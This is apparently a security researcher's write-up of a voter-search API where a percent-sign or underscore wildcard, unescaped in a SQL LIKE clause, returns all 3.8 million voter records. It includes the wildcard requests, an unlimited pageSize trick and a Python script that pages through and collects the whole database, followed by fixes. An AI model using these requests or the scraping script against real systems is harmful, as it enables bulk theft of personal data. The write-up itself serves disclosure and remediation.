Searching for Every Voter With a Single Percent Sign
The platform was straightforward. A civic technology application that allowed authorized users — election officials, campaign volunteers, poll workers — to look up registered voters by name. Type a name, get a match. Standard search functionality that exists on thousands of government platforms.
The search field had a magnifying glass icon and a placeholder that read "Search by last name." Nothing about it suggested it would become the most interesting part of the assessment.
The Search That Returned Too Much
During the initial reconnaissance phase, I used the search function as intended. Typed a common last name, got a paginated list of results. The API behind it was clean — a single endpoint that accepted a query parameter and returned matching records:
GET /api/v1/voters/search?q=Smith
The response came back with a JSON array of voter records:
json
{
"results": [
{
"id": "VR-2847291",
"firstName": "James",
"lastName": "Smith",
"dateOfBirth": "1985-03-14",
"address": "1247 Oak Street, Apt 3B",
"city": "Springfield",
"state": "IL",
"zip": "62704",
"registrationDate": "2012-09-22",
"status": "Active",
"partyAffiliation": "Independent"
}
],
"total": 1847,
"page": 1,
"pageSize": 25
}Full names, home addresses, dates of birth, party affiliations. This was expected — it was the purpose of the application. The question was whether the search enforced any boundaries on what an authorized user could extract.
I started with the obvious tests. Empty string, single letter, special characters. Then I tried the percent sign:
GET /api/v1/voters/search?q=%25
The %25 is the URL-encoded form of %. The server decoded it, dropped it into a query, and the response came back:
json
{
"results": [
{ "id": "VR-0000001", "firstName": "Aaron", "lastName": "Aaberg", ... },
{ "id": "VR-0000002", "firstName": "Maria", "lastName": "Aaland", ... },
{ "id": "VR-0000003", "firstName": "Robert", "lastName": "Aames", ... }
],
"total": 3847291,
"page": 1,
"pageSize": 25
}3,847,291 results. Every registered voter in the system. Sorted alphabetically, paginated in chunks of 25 — and the pagination worked. Page 2, page 3, page 153,891. Every page returned the next 25 records, all the way to the end of the database.
Why It Worked
The backend was wrapping user input in a SQL LIKE clause for partial matching:
sql
SELECT * FROM voters WHERE last_name LIKE '%' || $1 || '%'When the input itself is %, the query becomes LIKE '%%%' — three wildcards that match every row in the table. The query was parameterized, so traditional SQL injection was blocked. But the LIKE clause worked exactly as designed. The application never sanitized wildcard metacharacters, so the percent sign was not an injection — it was a valid pattern that happened to mean "return everything."
The Scope of Exposure
The pagination endpoint had no upper bound. There was no maximum page number, no query timeout, and no limit on how many pages a single session could request. A simple script could iterate through every page and collect the full dataset:
python
import requests
session = requests.Session()
session.headers.update({"Authorization": "Bearer <valid_token>"})
page = 1
all_records = []
while True:
response = session.get(
"https://platform.example/api/v1/voters/search",
params={"q": "%", "page": page, "pageSize": 100}
)
data = response.json()
all_records.extend(data["results"])
if page * 100 >= data["total"]:
break
page += 1
print(f"Collected {len(all_records)} records")I modified the pageSize parameter as well. The default was 25, but the API accepted arbitrary values:
GET /api/v1/voters/search?q=%25&page=1&pageSize=10000
It returned 10,000 records in a single response. No server-side maximum. The only constraint was how large a JSON response the client was willing to parse.
With a pageSize of 10,000, the entire database could be extracted in under 400 requests. At the rate the server responded, that was roughly fifteen minutes of scripted pagination.
The Underscore Variant
The percent sign was not the only wildcard that worked. The underscore character (_) matches exactly one character in SQL LIKE syntax. This enabled more targeted extraction:
GET /api/v1/voters/search?q=___
Three underscores. This matched every last name that was exactly three characters long. While less dramatic than dumping the entire database, it demonstrated that wildcard syntax was being interpreted directly, and it could be used for precision queries:
GET /api/v1/voters/search?q=S____
Every five-letter last name starting with S. Combined with other data points, this could narrow searches to specific individuals without knowing their exact name — a capability the application was not designed to provide.
What Made This Dangerous
The data exposed per record was substantial: full legal name, date of birth, home address, party affiliation, registration status, and registration date. This is the combination of fields that identity verification systems use. It is also the combination that enables targeted social engineering, voter intimidation, and identity fraud.
The volume amplified the impact. This was not a single record disclosed through an IDOR. It was the entire population of registered voters in the jurisdiction, extractable in bulk, by any user with a valid session token. Campaign volunteers, temporary poll workers, anyone with legitimate but limited-purpose access could execute this extraction.
The application had audit logging, but the logs recorded the HTTP request, not the semantic intent. A request to /api/v1/voters/search?q=%25 looked identical in structure to a request to /api/v1/voters/search?q=Johnson. Nothing in the logging infrastructure distinguished a legitimate name search from a full database extraction.
The Fix
The remediation required changes at multiple levels.
Escape wildcard characters in user input. Before passing user input into a LIKE clause, escape the % and _ characters so they are treated as literal characters, not wildcards:
sql
-- Before: wildcards pass through
SELECT * FROM voters WHERE last_name LIKE '%' || $1 || '%'
-- After: wildcards escaped
SELECT * FROM voters
WHERE last_name LIKE '%' || replace(replace($1, '%', '\%'), '_', '\_') || '%'
ESCAPE '\'Enforce minimum input length. Reject searches shorter than two or three characters. A single-character search has no legitimate use case and should return an error, not results.
Cap result counts. Enforce a maximum total result count server-side. If a query matches more than a reasonable threshold — say 500 records — return an error asking the user to refine their search. Do not return the first 500 and tell them there are 3.8 million more.
Lock down page size. The server should enforce a maximum pageSize regardless of what the client requests. Accept 25, 50, or 100. Reject 10,000.
Add semantic audit logging. Log not just the request parameters but the result count. A search that returns 3.8 million matches should trigger an alert, regardless of what character was searched.
The Deeper Lesson
This vulnerability did not require breaking anything. The SQL query was parameterized. The authentication was valid. The authorization model was correct — the user was permitted to search for voters. Every component worked exactly as designed.
The problem was a missing assumption. The developers assumed the search field would contain names. They did not account for the fact that SQL LIKE syntax has metacharacters, and that those metacharacters would be interpreted by the database engine even when delivered through parameterized queries.
Parameterized queries prevent SQL injection. They do not prevent SQL from doing what you told it to do. If you tell the database to match every row, it will match every row. The application has to decide what queries are acceptable, not just what queries are syntactically safe.
A search field that accepts % is a search field that accepts "return everything." That is not an injection. It is a feature — one that nobody intended to ship.